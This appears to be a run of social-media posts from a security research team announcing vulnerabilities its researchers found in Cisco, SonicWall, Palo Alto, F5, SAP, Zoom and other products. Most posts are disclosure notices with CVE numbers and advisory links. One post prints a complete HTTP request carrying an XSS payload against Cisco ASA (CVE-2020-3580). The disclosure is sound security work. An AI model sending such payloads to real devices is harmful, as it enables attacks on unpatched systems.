A swarm of Palo Alto PAN-OS CVE-s is here: 1⃣ Post-Auth RCE (CVE-2020-2037) 2⃣ Post-Auth RCE (CVE-2020-2038) 3⃣ Unauth DoS (CVE-2020-2039) 4⃣ Cross-Site Scripting (CVE-2020-2036) Attributed to: Mikhail Klyuchnikov & Nikita Abramov Advisory: security.paloaltonetworks.com/?q=2020-09-09

Checkpoint patched a vulnerability in a Gaia OS component (CVE-2020-6020) discovered by our researchers Mikhail Klyuchnikov & Nikita Abramov. Argument Injection led to Arbitrary File Reading with root privileges and DoS. supportcenter.checkpoint.com/supportcenter/…

11 SonicWall CVE-s 460.000 hosts by shodan 1 researcher - Nikita Abramov Stack Overflow, Heap Overflow, Memory Leak and more! CVE-2020-5133,34,...,43 CVSS: 9.4 to 5.3 Update your systems! 👉psirt.global.sonicwall.com/vuln-list

We know it's a slow news day, week, month, and year, but don't worry, we're here to help! The 2020 Pwnie Award Nominees are up! pwnies.com/nominations/ac…

The advisory for multiple unauth RCE in Cisco Integrated Management Controller (CVE-2020-3470) is now out! Buffer Overflows lead to RCE with uid=0 (root) privileges Discovered by Nikita Abramov tools.cisco.com/security/cente…

⚠️F5 fixes BIG-IP Unauth DoS (CVE-2020-27716) found by our researcher Nikita Abramov. Versions affected: 15.0.0 ≤ BIG-IP(APM) < 15.1.1 BIG-IP(APM) < 14.1.3.1 The advisory: support.f5.com/csp/article/K5…

It's time to sum up the year. We created a list of the most interesting vulnerabilities found by our team in 2020. Post in the comments your favorites from the list and stay tuned for more vulnerabilities. 🎄Happy New Year's!🎄

WINDOWS KERNEL ZERO-DAY EXPLOIT (CVE-2021-1732) IS USED BY BITTER APT IN TARGETED ATTACK ti.dbappsecurity.com.cn/blog/index.php…

🔥New article: "Swarm of Palo Alto PAN-OS vulnerabilities". Two RCEs and other bugs found by our researchers Mikhail Klyuchnikov & Nikita Abramov. swarm.ptsecurity.com/swarm-of-palo-… Full analysis 👆

We published GHIDRA plugin for NodeJS Bytenode (JSC) binaries github.com/PositiveTechno… #ghidra #v8 #nodejs #reverse

Cisco fixed an Unauth DoS in Adaptive Security Appliance and Firepower Threat Defense found by our researcher Nikita Abramov. Assigned CVEs: CVE-2021-1445, CVE-2021-1504 Advisory: tools.cisco.com/security/cente…

Cisco fixed two Unauth RCEs and an Arbitrary File Upload in HyperFlex HX Data Platform found by our researchers Nikita Abramov and Mikhail Klyuchnikov. CVE-2021-1497 CVE-2021-1498 CVE-2021-1499 Advisory: tools.cisco.com/security/cente…

SonicWall fixed a Post-Auth RCE (CVE-2021-20026) in Network Security Manager and an Unauth Buffer Overflow (CVE-2021-20027) in SonicOS found by our researcher Nikita Abramov. Advisory: psirt.global.sonicwall.com/vuln-detail/SN…

🎁PoC for XSS in Cisco ASA (CVE-2020-3580) POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 Host: ciscoASA.local Content-Type: application/x-www-form-urlencoded Content-Length: 44 SAMLResponse="><svg/onload=alert('PTSwarm')>

🙈🙉🙊Citrix has removed the acknowledgement of our researcher Mikhail Klyuchnikov who discovered and reported CVE-2019-19781 - the Citrix ADC RCE! @Citrix we will be pleased to hear your response. Current: support.citrix.com/article/CTX267… Mar 2021: web.archive.org/web/2021032109…

⚡️SAP fixed Post-Auth RCE (CVE-2021-38163) in SAP NetWeaver found by our researcher Mikhail Klyuchnikov. CVSS 9.9 🔥 No credits from SAP again. Advisory: wiki.scn.sap.com/wiki/pages/vie…

⚠️ Zoom fixed two post-auth RCE (CVE-2021-34416, CVE-2021-34414) and remote system crash (CVE-2021-34415) in Zoom on-premise Meeting Connector found by our researchers Nikita Abramov and Egor Dimitrenko. Advisory: explore.zoom.us/en/trust/secur…

Cisco fixed an Unauth DoS (CVE-2021-34704) in Cisco ASA and Cisco FTD found by our researcher Nikita Abramov. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition. Shodan: 242,070 results 🔥 Advisory: tools.cisco.com/security/cente…

HPE fixed two vulnerabilities in OneView found by our researcher Nikita Abramov. 1️⃣ CVE-2022-23699 - Authentication Restriction Bypass 2️⃣ CVE-2022-23700 - Unauthorized Read Access to Files Find out more ➡️ support.hpe.com/hpesc/public/d…

💎Cisco fixed an Authenticated Heap Overflow Vulnerability (CVE-2022-20737) in Cisco ASA found by our researcher Nikita Abramov. The vulnerability allows an attacker to cause a DoS or to obtain portions of process memory from the device. The advisory: tools.cisco.com/security/cente…